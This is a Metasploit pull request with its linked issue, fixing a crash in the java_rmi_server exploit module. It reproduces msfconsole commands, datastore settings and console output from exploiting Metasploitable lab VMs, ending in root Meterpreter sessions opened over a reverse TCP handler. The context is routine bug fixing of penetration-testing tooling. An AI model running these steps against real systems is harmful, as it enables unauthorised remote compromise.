### PR TITLE
Fix java rmi service undefined method wait

### LINKED ISSUE #16383: java_rmi_server exploit fails with NoMethodError undefined method `wait' for nil:NilClass (on nightly builds on Linux since begining of 2022)
## Steps to reproduce

How'd you do it?

1. start metasploitable 1 somewhere -- it runs old java rmi registry
2. start msfconsole
3. use exploit/multi/misc/java_rmi_server 
4. set HTTPDELAY 60
5. set RHOSTS <here put your metasplitable instance IP>
6. exploit

And the output is this:

```
[*] Started reverse TCP handler on 10.0.10.115:4444 
[*] 10.0.10.42:1099 - Using URL: http://0.0.0.0:8080/TUNYQOcmFuvxt
[*] 10.0.10.42:1099 - Local IP: http://10.0.10.115:8080/TUNYQOcmFuvxt
[*] 10.0.10.42:1099 - Server started.
[*] 10.0.10.42:1099 - Sending RMI Header...
[*] 10.0.10.42:1099 - Sending RMI Call...
[*] 10.0.10.42:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 10.0.10.42
[*] Meterpreter session 1 opened (10.0.10.115:4444 -> 10.0.10.42:41859 ) at 2022-03-25 20:43:56 +0100
[-] 10.0.10.42:1099 - Exploit failed: NoMethodError undefined method `wait' for nil:NilClass
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) > 

```

The thing is, although exploit claims it failed completely by last output line `[*] Exploit completed, but no session was created.` -- still meterpreter console is open on background. The problem is, it's not open on foreground as usual.

```
msf6 exploit(multi/misc/java_rmi_server) > sessions -l

Active sessions
===============

  Id  Name  Type                    Information            Connection
  --  ----  ----                    -----------            ----------
  1         meterpreter java/linux  root @ metasploitable  10.0.10.115:4444 -> 10.0.10.42:41859  (10.0.10.42)

msf6 exploit(multi/misc/java_rmi_server) > 
```

## Were you following a specific guide/tutorial or reading documentation?

No, but this is common java_rmi exploit, it's documented everywhere so I use that for testing new metasploit nightly bits.

## Expected behavior

The error ```[-] 10.0.10.42:1099 - Exploit failed: NoMethodError undefined method `wait' for nil:NilClass``` should not be there and the prompt should be switched to `Meterpreter>`

## Current behavior

As I wrote above.

### Metasploit version

This is by testing metasploit nightly builds on both up-to-date Kali Linux and on Ubuntu 20.04. It happens since around begging of this year (2022) but maybe slightly into it (end of Jan, begging of Feb or so).

On Kali I have:
Framework Version: 6.1.32-dev

On Ubuntu 20.04 LTS I have:
Framework Version: 6.1.35-dev-

##  Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:
<details>
<summary>Collapse</summary>

```
[framework/ui/console]
ActiveModule=exploit/multi/misc/java_rmi_server

[multi/misc/java_rmi_server]
CheckModule=auxiliary/scanner/misc/java_rmi_server
WfsDelay=10
WORKSPACE=
VERBOSE=false
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
RHOSTS=10.0.10.42
RPORT=1099
SSL=false
SSLVersion=Auto
SSLVerifyMode=PEER
SSLCipher=
Proxies=
CPORT=
CHOST=
ConnectTimeout=10
TCP::max_send_size=0
TCP::send_delay=0
RmiReadLoopTimeout=1
SRVHOST=0.0.0.0
SRVPORT=8080
ListenerComm=
SSLCert=
SSLCompression=false
URIPATH=
HTTP::no_cache=false
HTTP::chunked=false
HTTP::header_folding=false
HTTP::junk_headers=false
HTTP::compression=none
HTTP::server_name=Apache
URIHOST=
URIPORT=
SendRobots=false
HTTPDELAY=60
PAYLOAD=java/meterpreter/reverse_tcp
LHOST=10.0.10.115
loglevel=3
```

</details>

##  Database Configuration

The database contains the following information:
<details>
<summary>Collapse</summary>

```
Session Type: Connected to msf. Connection type: postgresql.
```

| ID | Hosts | Vulnerabilities | Notes | Services |
|-:|-:|-:|-:|-:|
| 1 **(Current)** | 1 | 1 | 1 | 0 |
| **Total (1)** | **1** | **1** | **1** | **0** |

</details>

##  History

The following commands were ran during the session and before this issue occurred:
<details>
<summary>Collapse</summary>

```
2000   use exploit/multi/misc/java_rmi_server
2001   set HTTPDELAY 60
2002   set RHOSTS 10.0.10.42
2003   set loglevel 3
2004   exploit
2005   debug
```
</details>

##  Framework Errors

The following framework errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/25/2022 20:43:56] [e(0)] core: Exploit failed (multi/misc/java_rmi_server): NoMethodError undefined method `wait' for nil:NilClass - NoMethodError undefined method `wait' for nil:NilClass
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/25/2022 21:05:49] [e(0)] core: Exploit failed (multi/misc/java_rmi_server): NoMethodError undefined method `wait' for nil:NilClass - NoMethodError undefined method `wait' for nil:NilClass
```

</details>

##  Web Service Errors

The following web service errors occurred before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Framework Logs

The following framework logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>
```
[03/24/2022 20:05:16] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/24/2022 20:05:16] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/24/2022 20:05:16] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/24/2022 20:05:46] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[03/24/2022 20:05:55] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:05:55] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:05:55] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/24/2022 20:05:55] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/24/2022 20:05:55] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/24/2022 20:06:19] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[03/24/2022 20:06:26] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:06:26] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:06:26] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/24/2022 20:06:26] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/24/2022 20:06:26] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/24/2022 20:06:44] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[03/24/2022 20:06:52] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:06:52] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:06:52] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/24/2022 20:06:52] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/24/2022 20:06:52] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/24/2022 20:07:32] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[03/24/2022 20:07:42] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:07:42] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/24/2022 20:07:42] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/24/2022 20:07:42] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/24/2022 20:07:42] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/25/2022 19:48:20] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/25/2022 19:48:20] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/25/2022 19:48:21] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/25/2022 19:48:21] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/25/2022 19:48:21] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/25/2022 19:48:54] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[03/25/2022 19:48:55] [e(0)] core: Exploit failed (multi/misc/java_rmi_server): NoMethodError undefined method `wait' for nil:NilClass - NoMethodError undefined method `wait' for nil:NilClass
[03/25/2022 20:37:06] [w(0)] core: Session 1 has died
[03/25/2022 20:37:09] [d(0)] core: HistoryManager.pop_context name: :msfconsole
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/25/2022 20:42:10] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/25/2022 20:42:11] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/25/2022 20:43:55] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[03/25/2022 20:43:56] [e(0)] core: Exploit failed (multi/misc/java_rmi_server): NoMethodError undefined method `wait' for nil:NilClass - NoMethodError undefined method `wait' for nil:NilClass
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/x64/encrypted_shell_reverse_tcp is not supported
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/encrypted_shell_reverse_tcp is not supported
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/encrypted_reverse_tcp is not supported
[03/25/2022 21:05:01] [e(0)] core: Dependency for windows/x64/encrypted_reverse_tcp is not supported
[03/25/2022 21:05:01] [d(0)] core: HistoryManager.push_context name: :msfconsole
[03/25/2022 21:05:48] [w(0)] core: Warning: trying to report a session_event for a session with no db_record (1)
[03/25/2022 21:05:49] [e(0)] core: Exploit failed (multi/misc/java_rmi_server): NoMethodError undefined method `wait' for nil:NilClass - NoMethodError undefined method `wait' for nil:NilClass
```

</details>

##  Web Service Logs

The following web service logs were recorded before the issue occurred:
<details>
<summary>Collapse</summary>

```
msf-ws.log does not exist.
```

</details>

##  Version/Install

The versions and install method of your Metasploit setup:
<details>
<summary>Collapse</summary>

```
Framework: 6.1.32-dev
Ruby: ruby 2.7.4p191 (2021-07-07 revision a21a3b7d23) [x86_64-linux-gnu]
Install Root: /usr/share/metasploit-framework
Session Type: Connected to msf. Connection type: postgresql.
Install Method: Other - Please specify
```

</details>

msf6 exploit(multi/misc/java_rmi_server) >

### PR DESCRIPTION
**Pull request by adfoster-r7**
Fixes a crash introduced by https://github.com/rapid7/metasploit-framework/commit/1494f804e74ebec0aba8db3dcd30736acdeea204

Closes https://github.com/rapid7/metasploit-framework/issues/16383

## Verification

- Download metasploitable 2 - https://information.rapid7.com/download-metasploitable-2017-thanks.html and run it in a vm
- Run the module against the target:
```
use exploit/multi/misc/java_rmi_server
run metasploitable2_ip
```

Verify there is no longer an error:
```
[*] Started reverse TCP handler on 10.0.10.115:4444 
[*] 10.0.10.42:1099 - Using URL: http://0.0.0.0:8080/TUNYQOcmFuvxt
[*] 10.0.10.42:1099 - Local IP: http://10.0.10.115:8080/TUNYQOcmFuvxt
[*] 10.0.10.42:1099 - Server started.
[*] 10.0.10.42:1099 - Sending RMI Header...
[*] 10.0.10.42:1099 - Sending RMI Call...
[*] 10.0.10.42:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 10.0.10.42
[*] Meterpreter session 1 opened (10.0.10.115:4444 -> 10.0.10.42:41859 ) at 2022-03-25 20:43:56 +0100
[-] 10.0.10.42:1099 - Exploit failed: NoMethodError undefined method `wait' for nil:NilClass <----
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) > 

```

### CODE REVIEW

**Comment by bcoles** [comment]
# Before

```
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.142:1099 - Using URL: http://192.168.200.130:8080/cyjoPUV
[*] 192.168.200.142:1099 - Server started.
[*] 192.168.200.142:1099 - Sending RMI Header...
[*] 192.168.200.142:1099 - Sending RMI Call...
[*] 192.168.200.142:1099 - Replied to request for payload JAR
[-] 192.168.200.142:1099 - Exploit failed: NoMethodError undefined method `wait' for nil:NilClass
[*] Exploit completed, but no session was created.
msf6 exploit(multi/misc/java_rmi_server) > 
```

# After

```
msf6 > use exploit/multi/misc/java_rmi_server
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
msf6 exploit(multi/misc/java_rmi_server) > set rhosts 192.168.200.142
rhosts => 192.168.200.142
msf6 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.200.130:4444 
[*] 192.168.200.142:1099 - Using URL: http://192.168.200.130:8080/pAczKZ
[*] 192.168.200.142:1099 - Server started.
[*] 192.168.200.142:1099 - Sending RMI Header...
[*] 192.168.200.142:1099 - Sending RMI Call...
[*] 192.168.200.142:1099 - Replied to request for payload JAR
[*] Sending stage (58851 bytes) to 192.168.200.142
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.142:44375 ) at 2022-03-27 23:36:08 -0400

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer        : metasploitable
OS              : Linux 2.6.24-16-server (i386)
Architecture    : x86
System Language : en_US
Meterpreter     : java/linux
meterpreter > 
```

**Review by bcoles — APPROVED** [review]

**Comment by bcoles** [comment]
# Release Notes

Ensure `Exploit::Remote::SocketServer` does not call the associated `Rex::ServiceManager` service `wait` method if the service has already stopped.
